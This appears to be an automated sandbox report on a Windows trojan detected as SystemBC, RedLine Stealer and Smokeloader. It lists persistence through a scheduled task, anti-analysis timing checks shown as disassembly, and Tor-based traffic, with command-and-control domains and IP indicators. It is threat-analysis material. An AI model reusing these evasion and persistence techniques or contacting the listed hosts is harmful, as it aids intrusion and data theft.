            Source: 1.3.orvsmwx.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.p9CvI6kq7d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 00000000.00000002.245017062.0000000000546000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile created: C:\Windows\Tasks\orvsmwx.jobJump to behavior
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_0040CB7F0_2_0040CB7F
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_0040B3FB0_2_0040B3FB
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: String function: 00406EE2 appears 32 times
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: String function: 00406DF2 appears 32 times
            Source: p9CvI6kq7d.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: orvsmwx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: p9CvI6kq7d.exeVirustotal: Detection: 80%
            Source: p9CvI6kq7d.exeReversingLabs: Detection: 88%
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile read: C:\Users\user\Desktop\p9CvI6kq7d.exeJump to behavior
            Source: p9CvI6kq7d.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\p9CvI6kq7d.exe C:\Users\user\Desktop\p9CvI6kq7d.exe
            Source: unknownProcess created: C:\ProgramData\prfxiau\orvsmwx.exe C:\ProgramData\prfxiau\orvsmwx.exe start
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@2/3@13/12
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00405832 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,0_2_00405832
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00405C22 CreateToolhelp32Snapshot,Process32First,CloseHandle,FindCloseChangeNotification,0_2_00405C22
            Source: C:\ProgramData\prfxiau\orvsmwx.exeMutant created: \BaseNamedObjects\orvsmwx
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeMutant created: \Sessions\1\BaseNamedObjects\orvsmwx
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00412D7B _lopen,BuildCommDCBAndTimeoutsA,GetPriorityClass,SetConsoleMode,SizeofResource,0_2_00412D7B
            Source: p9CvI6kq7d.exeString found in binary or memory: ip-address
            Source: C:\ProgramData\prfxiau\orvsmwx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeUnpacked PE file: 0.2.p9CvI6kq7d.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeUnpacked PE file: 0.2.p9CvI6kq7d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: initial sampleStatic PE information: section name: .text entropy: 7.3635971049801014
            Source: initial sampleStatic PE information: section name: .text entropy: 7.3635971049801014
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile created: C:\ProgramData\prfxiau\orvsmwx.exeJump to dropped file
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile created: C:\ProgramData\prfxiau\orvsmwx.exeJump to dropped file
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile created: C:\Windows\Tasks\orvsmwx.jobJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49753
            Source: p9CvI6kq7d.exe, p9CvI6kq7d.exe, 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, p9CvI6kq7d.exe, 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: onion-port

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-6232
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeRDTSC instruction interceptor: First address: 0000000000406A32 second address: 0000000000406A32 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, ecx 0x0000001a test edx, edx 0x0000001c je 00007FEB705C3D95h 0x0000001e imul eax, edx 0x00000021 xor edx, edx 0x00000023 mul dword ptr [ebp+08h] 0x00000026 mov eax, edx 0x00000028 pop esi 0x00000029 pop edi 0x0000002a pop edx 0x0000002b pop ecx 0x0000002c pop ebx 0x0000002d leave 0x0000002e retn 0004h 0x00000031 lea ebx, dword ptr [eax+04h] 0x00000034 push 00000018h 0x00000036 call 00007FEB705C973Ah 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-6538
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exe TID: 3728Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-6778
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00406A32 rdtsc 0_2_00406A32
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-6256
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeThread delayed: delay time: 60000Jump to behavior
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeAPI call chain: ExitProcess graph end nodegraph_0-7341
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00406A32 rdtsc 0_2_00406A32
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]0_2_00401000
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00406DF2 mov eax, dword ptr fs:[00000030h]0_2_00406DF2
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_0067092B mov eax, dword ptr fs:[00000030h]0_2_0067092B
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00677042 mov eax, dword ptr fs:[00000030h]0_2_00677042
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00670D90 mov eax, dword ptr fs:[00000030h]0_2_00670D90
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\prfxiau\orvsmwx.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: GetLocaleInfoA,0_2_0040C982
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00405832 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,0_2_00405832
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00405832 CoInitialize,CoCreateInstance,GetUserNameExW,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,CoUninitialize,0_2_00405832
            Source: p9CvI6kq7d.exe, p9CvI6kq7d.exe, 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, p9CvI6kq7d.exe, 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: a2guard.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.3.p9CvI6kq7d.exe.680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p9CvI6kq7d.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p9CvI6kq7d.exe.670e50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.orvsmwx.exe.590000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p9CvI6kq7d.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: p9CvI6kq7d.exe PID: 3184, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.3.p9CvI6kq7d.exe.680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p9CvI6kq7d.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p9CvI6kq7d.exe.670e50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.orvsmwx.exe.590000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p9CvI6kq7d.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: p9CvI6kq7d.exe PID: 3184, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts12
            Native API
            1
            Scheduled Task/Job
            1
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            OS Credential Dumping1
            System Time Discovery
            Remote Services12
            Archive Collected Data
            Exfiltration Over Other Network Medium2
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            Scheduled Task/Job
            2
            Obfuscated Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Scheduled Task/Job
            Logon Script (Windows)Logon Script (Windows)23
            Software Packing
            Security Account Manager122
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Masquerading
            NTDS22
            Security Software Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer1
            Multi-hop Proxy
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Virtualization/Sandbox Evasion
            LSA Secrets11
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits2
            Non-Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Process Injection
            Cached Domain Credentials2
            Process Discovery
            VNCGUI Input CaptureExfiltration Over C2 Channel113
            Application Layer Protocol
            Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Owner/User Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative Protocol1
            Proxy
            Rogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Remote System Discovery
            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
            System Network Configuration Discovery
            Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            p9CvI6kq7d.exe80%VirustotalBrowse
            p9CvI6kq7d.exe88%ReversingLabsWin32.Trojan.RanumBot
            p9CvI6kq7d.exe100%AviraHEUR/AGEN.1209913
            p9CvI6kq7d.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\ProgramData\prfxiau\orvsmwx.exe100%AviraHEUR/AGEN.1209913
            C:\ProgramData\prfxiau\orvsmwx.exe100%Joe Sandbox ML
            C:\ProgramData\prfxiau\orvsmwx.exe88%ReversingLabsWin32.Trojan.RanumBot
            SourceDetectionScannerLabelLinkDownload
            1.0.orvsmwx.exe.400000.0.unpack100%AviraHEUR/AGEN.1209913Download File
            0.3.p9CvI6kq7d.exe.680000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.p9CvI6kq7d.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
            0.2.p9CvI6kq7d.exe.670e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.0.p9CvI6kq7d.exe.400000.0.unpack100%AviraHEUR/AGEN.1209913Download File
            1.3.orvsmwx.exe.590000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
            SourceDetectionScannerLabelLink
            asdasd08.xyz12%VirustotalBrowse
            ip4.seeip.org1%VirustotalBrowse
            asdasd08.com11%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://ip4.seeip.org/0%URL Reputationsafe
            http://84.144.111.46/tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb150%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff50%Avira URL Cloudsafe
            http://84.144.111.46/tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab0%Avira URL Cloudsafe
            http://84.144.111.46/tor/server/fp/742091486d04734c57d97bcefb53d22ed0b778810%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d0%Avira URL Cloudsafe
            http://77.7.81.140/tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb150%Avira URL Cloudsafe
            asdasd08.com100%Avira URL Cloudmalware
            http://84.144.111.46/tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec0%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab0%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb0%Avira URL Cloudsafe
            http://77.7.81.140/tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f0%Avira URL Cloudsafe
            http://77.7.81.140/tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab0%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b880%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/aacd4e09e65ba18caf35fbc855ef659505b36e9e0%Avira URL Cloudsafe
            http://193.23.244.244/tor/status-vote/current/consensus100%Avira URL Cloudmalware
            http://151.20.208.221/tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb150%Avira URL Cloudsafe
            http://84.144.111.46/tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d0%Avira URL Cloudsafe
            http://151.20.208.221/tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f0%Avira URL Cloudsafe
            http://77.7.81.140/tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab0%Avira URL Cloudsafe
            asdasd08.xyz100%Avira URL Cloudmalware
            http://77.7.81.140/tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff50%Avira URL Cloudsafe
            http://84.144.111.46/tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b880%Avira URL Cloudsafe
            https://386bsd.net0%Avira URL Cloudsafe
            http://84.144.111.46/tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff50%Avira URL Cloudsafe
            http://77.7.81.140/tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b880%Avira URL Cloudsafe
            http://84.144.111.46/tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f0%Avira URL Cloudsafe
            http://86.59.21.38/tor/status-vote/current/consensus100%Avira URL Cloudmalware
            http://131.188.40.189/tor/status-vote/current/consensus100%Avira URL Cloudmalware
            http://77.7.81.140/tor/server/fp/5d5ddff29b96cc566aa746636868eb07f97de60c0%Avira URL Cloudsafe
            http://77.7.81.140/tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api4.ipify.org
            64.185.227.156
            truefalse
              high
              asdasd08.xyz
              34.171.171.32
              truetrueunknown
              ip4.seeip.org
              23.128.64.141
              truefalseunknown
              asdasd08.com
              34.171.171.32
              truetrueunknown
              api.ipify.org
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  high
                  http://151.20.208.221/tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20dfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://151.20.208.221/tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5false
                  • Avira URL Cloud: safe
                  unknown
                  https://ip4.seeip.org/false
                  • URL Reputation: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15false
                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15abfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/742091486d04734c57d97bcefb53d22ed0b77881false
                  • Avira URL Cloud: safe
                  unknown
                  http://77.7.81.140/tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15false
                  • Avira URL Cloud: safe
                  unknown
                  asdasd08.comtrue
                  • Avira URL Cloud: malware
                  unknown
                  http://151.20.208.221/tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15abfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://84.144.111.46/tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ecfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://151.20.208.221/tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fbfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://193.23.244.244/tor/status-vote/current/consensusfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://77.7.81.140/tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6ffalse
                  • Avira URL Cloud: safe
                  unknown
                  http://77.7.81.140/tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15abfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://151.20.208.221/tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88false
                  • Avira URL Cloud: safe
                  unknown
                  http://151.20.208.221/tor/server/fp/aacd4e09e65ba18caf35fbc855ef659505b36e9efalse
                  • Avira URL Cloud: safe
                  unknown
                  http://151.20.208.221/tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15false
